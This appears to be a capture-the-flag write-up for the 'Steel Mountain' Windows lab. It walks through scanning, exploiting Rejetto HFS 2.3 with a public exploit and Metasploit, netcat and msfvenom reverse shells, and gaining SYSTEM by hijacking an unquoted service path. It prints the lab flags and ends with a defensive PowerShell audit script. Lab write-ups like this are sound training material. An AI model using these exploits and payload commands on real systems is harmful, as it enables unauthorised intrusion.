Steel Mountain
export IP=10.10.6.167
Initial Scan
nmap -sC -sV -vvv -T5 $IP
Discovered open port 80/tcp on 10.10.6.167
Discovered open port 139/tcp on 10.10.6.167
Discovered open port 445/tcp on 10.10.6.167
Discovered open port 3389/tcp on 10.10.6.167
Discovered open port 8080/tcp on 10.10.6.167
Discovered open port 135/tcp on 10.10.6.167
Discovered open port 49156/tcp on 10.10.6.167
Discovered open port 49152/tcp on 10.10.6.167
Discovered open port 49153/tcp on 10.10.6.167
Discovered open port 49154/tcp on 10.10.6.167
Discovered open port 49155/tcp on 10.10.6.167
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server? syn-ack
| ssl-cert: Subject: commonName=steelmountain
| Issuer: commonName=steelmountain
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-05-07T06:00:58
| Not valid after: 2022-11-06T06:00:58
| MD5: 73f9 6f2a 1bff 257e c3a7 e0fb c80b f02e
| SHA-1: 1d95 7bf6 a120 07d1 85f5 b8e2 a4b1 ce84 e5c6 143a
|_ssl-date: 2022-05-08T06:06:40+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: STEELMOUNTAIN
| NetBIOS_Domain_Name: STEELMOUNTAIN
| NetBIOS_Computer_Name: STEELMOUNTAIN
| DNS_Domain_Name: steelmountain
| DNS_Computer_Name: steelmountain
| Product_Version: 6.3.9600
|_ System_Time: 2022-05-08T06:06:35+00:00
8080/tcp open http syn-ack HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49155/tcp open msrpc syn-ack Microsoft Windows RPC
49156/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-time:
| date: 2022-05-08T06:06:35
|_ start_date: 2022-05-08T06:00:49
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:a8:19:41:eb:4d (unknown)
| Names:
| STEELMOUNTAIN<20> Flags: <unique><active>
| STEELMOUNTAIN<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| Statistics:
| 02 a8 19 41 eb 4d 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 46572/tcp): CLEAN (Couldn't connect)
| Check 2 (port 58950/tcp): CLEAN (Couldn't connect)
| Check 3 (port 51527/udp): CLEAN (Timeout)
| Check 4 (port 43873/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:06
Completed NSE at 02:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:06
Completed NSE at 02:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:06
Completed NSE at 02:06, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.30 seconds
Notes
#Port 8080 : open http syn-ack HttpFileServer httpd 2.3
nmap -sC -sV -vvv -T5 --script=vuln $IP
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
| vulners:
| cpe:/a:rejetto:httpfileserver:2.3:
| EDB-ID:49584 10.0 https://vulners.com/exploitdb/EDB-ID:49584 *EXPLOIT*
| EDB-ID:49125 10.0 https://vulners.com/exploitdb/EDB-ID:49125 *EXPLOIT*
| EDB-ID:39161 10.0 https://vulners.com/exploitdb/EDB-ID:39161 *EXPLOIT*
| EDB-ID:34668 10.0 https://vulners.com/exploitdb/EDB-ID:34668 *EXPLOIT*
Rejetto HTTP File Server
searchsploit Rejetto HTTP File Server -w
CVE-2014-6287
Access and Escalation
wget https://www.exploit-db.com/download/39161
┌──(kali㉿kali)-[~/assets]
└─$ python2 39161.py
[.]Something went wrong..!
Usage is :[.] python exploit.py <Target IP address> <Target Port Number>
└─$ nc -nlvp 4443
listening on [any] 4443 ...
┌──(kali㉿kali)-[~/server]
└─$ sudo ufw allow 80
[sudo] password for kali:
Rules updated
Rules updated (v6)
┌──(kali㉿kali)-[~/server]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
└─$ wget https://github.com/andrew-d/static-binaries/raw/master/binaries/windows/x86/ncat.exe
└─$ mv ncat.exe server
ip addr
inet 10.11.53.56/16 scope global tun0
(changed local port and local address in .py)
┌──(kali㉿kali)-[~/server]
└─$ mv ncat.exe nc.exe
┌──(kali㉿kali)-[~/assets]
└─$ python2 39161.py 10.10.213.38 8080
┌──(kali㉿kali)-[~/server]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.213.38 - - [08/May/2022 17:58:48] "GET /nc.exe HTTP/1.1" 200 -
10.10.213.38 - - [08/May/2022 17:58:48] "GET /nc.exe HTTP/1.1" 200 -
10.10.213.38 - - [08/May/2022 17:58:48] "GET /nc.exe HTTP/1.1" 200 -
10.10.213.38 - - [08/May/2022 17:58:48] "GET /nc.exe HTTP/1.1" 200 -
└─$ nc -nlvp 4443
listening on [any] 4443 ...
connect to [10.11.53.56] from (UNKNOWN) [10.10.213.38] 49375
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>
┌──(kali㉿kali)-[~]
└─$ wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat
mv winPEAS.bat /home/kali/server/
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>powershell -c Invoke-WebRequest -Uri "http://10.11.53.56/winPEAS.bat" -OutFile "winpeas.bat"
powershell -c Invoke-WebRequest -Uri "http://10.11.53.56/winPEAS.bat" -OutFile "winpeas.bat"
PS> winpeas.bat
[i] The permissions are also checked and filtered using icacls
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
AdvancedSystemCareService9
powershell -c "Get-Service"
going to target : AdvancedSystemCareService9
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.11.53.56 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe-service file: 15872 bytes
Saved as: Advanced.exe
┌──(kali㉿kali)-[~/assets]
└─$ mv Advanced.exe ../server
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>cd C:\Program Files (x86)\IObit
cd C:\Program Files (x86)\IObit
powershell -c Invoke-WebRequest -Uri "http://10.11.53.56/Advanced.exe" -OutFile "Advanced.exe"
netcat -nlvp 4443
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 3436
FLAGS :
C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
[SC] ControlService FAILED 1062:
The service has not been started.
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 4068
FLAGS :
└─$ netcat -nlvp 4443
listening on [any] 4443 ...
connect to [10.11.53.56] from (UNKNOWN) [10.10.213.38] 49469
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>whoami
whoami
nt authority\system
Metasploit
msfconsole
msf6 > search Rejetto HTTP File Server
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec
msf6 > use 0
options
set LHOST tun0
echo $IP
set RHOST 10.10.234.134
set RPORT 8080
set SRVHOST <myip>
msf6 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.11.53.56:4444
[*] Using URL: http://10.11.53.56:8080/CQ1tmazB
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /CQ1tmazB
[*] Sending stage (175174 bytes) to 10.10.234.134
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\bill\Desktop
==============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-09-27 07:07:07 -0400 desktop.ini
100666/rw-rw-rw- 70 fil 2019-09-27 08:42:38 -0400 user.txt
meterpreter > cat user.txt
b04763b6fcf51fcd7c13abc7db4fd365
meterpreter >
Privilege Escalation
We now have a shell on the Windows machine as the user bill; from here we can enumerate further and escalate our privileges to SYSTEM (the Windows equivalent of root).
For this I am going to use a PowerShell script called PowerUp, which will evaluate the machine and report any misconfigurations.
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
meterpreter > upload /home/kali/assets/PowerUp.ps1
[*] uploading : /home/kali/assets/PowerUp.ps1 -> PowerUp.ps1
[*] Uploaded 2.13 MiB of 2.13 MiB (100.0%): /home/kali/assets/PowerUp.ps1 -> PowerUp.ps1
[*] uploaded : /home/kali/assets/PowerUp.ps1 -> PowerUp.ps1
meterpreter >
load powershell
powershell_shell
. .\PowerUp.ps1
Invoke-AllChecks
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
AdvancedSystemCareService9
With CanRestart set to True we are allowed to restart the service ourselves, and the directory containing the service binary is also writable. This means we can replace the legitimate executable with a malicious one and restart the service so that it runs our program instead.
To do this I will use a very basic msfvenom payload to generate a reverse shell:
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.53.56 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
Modifiable Path:
C:\Program Files (x86)\IObit\
meterpreter > upload /home/kali/assets/Advanced.exe
[*] uploading : /home/kali/assets/Advanced.exe -> Advanced.exe
[*] Uploaded 15.50 KiB of 15.50 KiB (100.0%): /home/kali/assets/Advanced.exe -> Advanced.exe
[*] uploaded : /home/kali/assets/Advanced.exe -> Advanced.exe
meterpreter >
meterpreter > ls
Listing: C:\Program Files (x86)\IObit
=====================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 32768 dir 2022-05-08 17:35:38 -0400 Advanced SystemCare
100777/rwxrwxrwx 15872 fil 2022-05-08 17:36:49 -0400 Advanced.exe
040777/rwxrwxrwx 16384 dir 2019-09-27 01:35:24 -0400 IObit Uninstaller
040777/rwxrwxrwx 4096 dir 2019-09-26 11:18:50 -0400 LiveUpdate
meterpreter > shell
Process 2308 created.
Channel 12 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 1076
FLAGS :
C:\Program Files (x86)\IObit>
┌──(kali㉿kali)-[~/assets]
└─$ nc -nlvp 4443
listening on [any] 4443 ...
connect to [10.11.53.56] from (UNKNOWN) [10.10.213.38] 49334
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>copy root.txt C:\
copy root.txt C:\
1 file(s) copied.
C:\Users\Administrator\Desktop>
c:\>copy root.txt Users/bill
copy root.txt Users/bill
1 file(s) copied.
c:\>
meterpreter > cat root.txt
9af5f314f57607c00fd09803a587db80
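As an added defensive check (not part of the original writeup), the following PowerShell audits a host for the exact condition PowerUp flagged above: a service whose binary path is unquoted and contains spaces, where a low-privileged group can create files in one of the directories Windows would try while resolving that path (for the IObit path above that includes C:\ and C:\Program Files (x86)\IObit). It assumes an elevated session on the host being reviewed; the group list and the rights mask are my choices, not values from the page.

```powershell
# Added audit example, not from the original writeup. Reports services whose
# unquoted path lets a low-privileged group plant a file where the service
# loader would find it first. Run from an elevated PowerShell session.

$lowPriv = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')
# Rights that allow creating a new file or directory (CreateDirectories is the
# same bit PowerUp reports as AppendData/AddSubdirectory)
$createMask = [System.Security.AccessControl.FileSystemRights] 'CreateFiles, CreateDirectories'

function Get-HijackCandidateDirs {
    param([string]$ExePath)
    # Every space in an unquoted path is a truncation point: for
    # "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe" Windows
    # tries C:\Program.exe, then ...\IObit\Advanced.exe, so the parent of each
    # space-delimited prefix is a directory worth checking.
    $dirs = @()
    $idx = $ExePath.IndexOf(' ')
    while ($idx -gt 0) {
        $prefix = $ExePath.Substring(0, $idx)
        $dirs += Split-Path -Parent $prefix
        $idx = $ExePath.IndexOf(' ', $idx + 1)
    }
    $dirs += Split-Path -Parent $ExePath
    return ($dirs | Select-Object -Unique)
}

function Test-LowPrivCreate {
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir)) { return @() }
    $hits = (Get-Acl -LiteralPath $Dir).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $lowPriv -contains $_.IdentityReference.Value -and
        (($_.FileSystemRights -band $createMask) -ne 0)
    }
    return @($hits | ForEach-Object { "$($_.IdentityReference): $($_.FileSystemRights)" })
}

foreach ($svc in Get-CimInstance Win32_Service) {
    $p = $svc.PathName
    # Only unquoted paths whose executable portion contains a space are affected
    if (-not $p -or $p.StartsWith('"') -or $p -notmatch '^(.+?\.exe)') { continue }
    $exe = $Matches[1]
    if ($exe -notmatch ' ') { continue }
    foreach ($dir in Get-HijackCandidateDirs $exe) {
        $who = Test-LowPrivCreate $dir
        if ($who.Count -gt 0) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; UnquotedPath = $p
                               WritableDir = $dir; Grants = ($who -join '; ') }
        }
    }
}
```

Any row with RunsAs of LocalSystem is the case shown in this writeup; quoting the ImagePath in the service's registry key and removing the create rights from the listed directory closes it.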
This post is licensed under CC BY 4.0 by the author.